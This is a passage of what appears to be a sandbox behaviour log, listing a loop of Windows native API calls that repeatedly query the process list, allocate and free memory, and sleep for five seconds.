RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.323] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.336] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.350] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.358] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.372] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.379] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.386] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.395] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.403] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.413] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.443] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.451] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.460] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.469] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) 